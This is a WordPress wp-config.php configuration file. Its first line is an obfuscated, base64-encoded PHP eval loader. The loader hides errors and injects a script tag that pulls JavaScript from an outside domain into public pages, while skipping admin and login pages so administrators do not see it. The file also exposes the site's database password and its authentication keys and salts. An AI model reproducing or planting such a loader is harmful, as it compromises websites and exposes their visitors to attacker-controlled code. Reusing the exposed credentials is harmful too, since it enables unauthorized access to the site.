eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWFkbWluL2FkbWluLWFqYXgucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJwb3MoQCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAiL3dwLWpzb24iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AvdjIiKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtYWRtaW4iKSA9PT0gZmFsc2UgJiYKICAgIHN0cnBvcyhAJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0sICIvd3AtbG9naW4ucGhwIikgPT09IGZhbHNlICYmCiAgICBzdHJ0b2xvd2VyKEAkX1NFUlZFUlsiSFRUUF9YX1JFUVVFU1RFRF9XSVRIIl0pICE9PSAieG1saHR0cHJlcXVlc3QiCikpIHsKICAgIHByaW50KGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJaTh2WVdzdVlXdGhiVFl3T0RBd0xtNWxkQzhpUGp3dmMyTnlhWEIwUGc9PSIpKTsKfQ==")); /** /** The name of the database for WordPress */ define( 'DB_NAME', 'aurofore_main' ); /** Database username */ define( 'DB_USER', 'aurofore_main' ); /** Database password */ define( 'DB_PASSWORD', 'info1357' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY','EnE)&3=6|HLn@m}#y!*>LCwgv/qiZe]xiX|{NaKn[$mOH[x]Z|qLc=~eWB>?P.@R'); define('SECURE_AUTH_KEY','X!=}|d7U66FHHZY*<1#zO_MLMIX,lqGlop,Hv}NVcfTgy162M%wB:3x1K+e+4%]C'); define('LOGGED_IN_KEY',',q/C@z_#ZDy}e%;fJ%s,C9,(poIC30s&KU/4&-Z9'); define('NONCE_KEY','-xw8y0<4-cy{^25LU+j^/aN%m#U!:{t C^38c_o_T@Qz!/#HNK*>ICxs[>&)yLyb'); define('AUTH_SALT','=<),vjWp^WoT*.`zvA{h6vS]HY%-xZ EdP-9WXh*1p)^W?`aA]-s!~ 8t>H .tcZ'); define('SECURE_AUTH_SALT','-Wnjq`75+2B3~=,:xNR9CXy*+iakyD=7A4j(&I9PJ?Kb+[ S_:@ gEG?_[vq#oUZ'); define('LOGGED_IN_SALT','}q&/pc?o{a;cl$|q-xR@Mt:Da[O~;2?bP-+*W-C|,sGk9=;+B&5+T mq?DTdZJ@^'); define('NONCE_SALT','-2Q92&Pvj{1.O]@apqAx}T:KM|.b7l kR5W#*.gvj^d_0qZ04CWH<@L?Rx|jK!0d'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define('WP_DEBUG', false); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';